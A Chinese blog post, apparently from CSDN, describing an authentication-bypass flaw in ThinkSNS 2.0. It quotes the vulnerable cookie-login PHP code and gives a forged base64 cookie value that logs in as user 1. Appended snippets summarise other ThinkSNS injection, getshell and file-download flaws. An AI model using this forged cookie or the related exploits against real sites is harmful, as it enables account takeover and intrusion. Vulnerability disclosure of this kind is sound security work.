thinksns2.0 登陆漏洞

最新推荐文章于 2021-03-31 18:51:39 发布
最新推荐文章于 2021-03-31 18:51:39 发布 · 221 阅读 · 0

1、源代码:
	/**
	 * 使用cookie登陆
	 * 
	 * @param string $cookieId
	 * @return boolean
	 */
	public function cookieLoginLocal($cookieId){
		$cookieId = explode( '.', base64_decode($cookieId) );
		if ($cookieId[0] !== 'thinksns') {
			return false;
		}else {
			$userInfo = M('user')->where('uid='.$cookieId[1])->find();
			return $this->loginLocal($userInfo['email']);
		}
	}

2、构造cookie name=TS_LOGGED_USER; content="base64_encode('thinksns.1')";host:localhost;path:/
3、测试成功(本地),测试thinksns在线demo是不成功,应该是有过改动,为什么不在发行版本里修改掉呢?
iteye_19283
关注
渗透thinksns官网
Coisini的博客
06-16 541
(本文涉及的所有漏洞已经被修复!) (由于文章是后来补写的,有些图可能无法抓到。sorry) ThinkSNS(简称TS),开源微博引擎。 一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞, 某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act...
渗透测试-信息收集专题
aming小老弟
12-15 1252
信息收集 思路框架知识整理 ​​主动信息收集-直接访问[工具]打点​​​​收集内容​​​​自动化收集大厂 过滤​​​​运营商​​​​1 收集可能存在sql注入的url​​​​路径 后缀​​​​公司架构​​​​产品规格​​​​网站标题​​​​全国省市县分布​​​​国外脆弱​​​​被动信息收集-第三方服务打点​​​​信息收集-...
[漏洞]ThinkSNS严重漏洞--将全站崩溃
数据库天地
09-14 217
author: selfimpr blog: http://blog.csdn.net/lgg201 mail: lgg860911@yahoo.com.cn 漏洞描述: 未对需要暴露在web环境下的脚本做目录结构上的规划, 访问特定脚本, 导致全站依赖的缓存系统崩溃, 全站崩溃. 实现方式: 由于造成后果太严重, 实现步骤不细说, 有兴趣的朋友可以根据描述研究. 造成后果请自己负责....
minify php,ThinkSNS public/minify.php 任意文件包含漏洞
weixin_39912580的博客
03-12 424
## 漏洞信息:ThinkSNS开源微博系统,是智士的开源社交平台。采用PHP+MySQL技术平台,微博+应用的产品模式,同时拥有iphone、android客户端、wap、3G版界面。ThinkSNS public/minify.php 存在任意文件包含漏洞,可被利用导致敏感信息泄漏。## 漏洞分析:问题在public/minify.php:```allowed_content_types=ar...
thinksns开源微博系统 V3上传漏洞
收集盒 Book box
04-20 1040
发布时间:2013-04-08  关键词:thinksns 微博 上传漏洞 ThinkSNS是基于互联网web2.0思想开发的老牌开源微博SNS系统,其开发始于2008年,其间经历了从 1.0→1.6→2.02.3→2.5→2.8→V3多个大版本的迭代,目前最新版本为V3。 thinksns v3 漏洞产生文件 attachaction.class.php: pu
【代码审计】ThinkSNS_V4 任意文件下载漏洞分析
12-03 789
  0x00 环境准备 ThinkSNS官网:http://www.thinksns.com 网站源码版本:ThinkSNS V4  更新时间:2017-09-13 程序源码下载:http://www.thinksns.com/experience.html(填写信息后,提交并下载代码) 默认后台:http://127.0.0.1/index.php?app=admin&amp...
thinksns V3(开源微博系统) getshell 漏洞附利用方法
收集盒 Book box
05-16 1442
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个 我就大概看了下 就发现个getshell 反正众测那么多黑客 肯定到时候有人挖出来 还不如放出来 attachaction.class.php   public function capture(){ error_reporting(0);
Thinksns微博系统注入漏洞即后台拿webshell
收集盒 Book box
09-20 1927
Exp: http://www.site.com/index.php?app=blog&mod=Index&act=show&id=1101 注入点注入字段 表ts_user `uid` int(11) NOT NULL AUTO_INCREMENT, `email` varchar(255) DEFAULT NULL, `password` varchar(255
漏洞与BUG
撸蛇的博客
08-02 2766
  最近浏览“混世魔王”的博客,看到他撰写的一篇博客《当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本不算漏洞,你会怎么处理这个问题?》,有所感触,便转载博文部分内容以作记录,如有侵权等相关问题,可以联系我,同时说明,最近对web攻防方面十分感兴趣,偶然机会浏览到“混世魔王”的博客,十分欣赏作者。 当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本...
社交系统ThinkSNS+从V0.8.7到V0.8.9我们到底修复了多少个bug?
weixin_33757911的博客
09-29 141
2019独角兽企业重金招聘Python工程师标准>>> ...
【实战篇】第19篇:ThinkSNS_V4 后台任意文件下载导致Getshell1
08-03
1、第三方网站,新建一个evil.php,作为第三方源文件: 2、登录后台,通过访问构造的url,成功下载第三方源的恶意脚本文件 3、 通过直接访问url,触发
ThinkSnS v4后台任意文件下载漏洞
weixin_30600503的博客
06-24 553
漏洞文件:/apps/admin/Lib/Action/UpgradeAction.class.php 主要问题还是出现在了180行直接将远程获取到的图片直接保存。 文中可见并没有做任何的对$downUrl进行过滤,$path也是。 所以就顺利的通过file_get_contents远程获取到了文件,然后通过file_put_contents写入到了$path当中。所以你远...
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现
qq_34788994的博客
06-07 1958
转载自 文章目录 闲扯 影响版本 原理分析 漏洞复现 闲扯 学习代码执行的审计时,遇到了双引号的一些迷惑,搜资料的时候发现了这个漏洞,顺便分析复现一哈。 影响版本 2.x、3.0-3.1 原理分析 关键代码: $depr = '\/'; $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/')); $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$v
$ac $f php 代码审计,代码审计之ThinkSNS v4.6.0最新版前台getshell
weixin_39637260的博客
03-31 250
前言对于一个后台的至getshell的漏洞点,若需要当作前台来利用,最直接的idea会想到什么?当然是XSS、CSRF了,这已经不是什么新鲜话题或trick了,较早的wordpress 前台XSS之Getshell、最近安全客也有人发过zzzphp1.6前台的Getshell方式使用类似的方法。所以笔者对ThinkSNS审计的后台漏洞分析及其利用同样结合CSRF进行。漏洞类型通用漏洞简介后台升级存...
php+后台+限制+登录次数,THINKSNS取消后台登录密码错误次数限制的办法详解
weixin_39573981的博客
03-27 616
在登录thinksns网站后台的时候,有些站长朋友会因为连续输错几次密码而被提示:“输入密码错误,您还可以是*次”,如果错误次数超过了限制的6次将会被锁定1个小时,这个措施也是为了保证网站后台安全而设计的,如果不想要被限制或增加输入的机会,可以在程序的对应位置做修改。小编在php空间调试后,终于有了解决的办法,下面为大家讲解解决thinksns后台登录错误次数限制的方法。限制原理:没当输入错误一次...
ThinkSNS不用登陆就可以访问的配置
helin916012530的专栏
12-18 3115
根目录下:config/access.inc.php 配置 /* * 游客访问的黑/白名单,不需要开放的,可以注释掉 */ return array ( "access" => array ( 'public/Register/*' => true, // 注册 'public/Passport/*' => true, // 登录 'public/Widget/*' =>
工程项目管理的高效团队建设与管理.docx
最新发布
07-09
工程项目管理的高效团队建设与管理.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值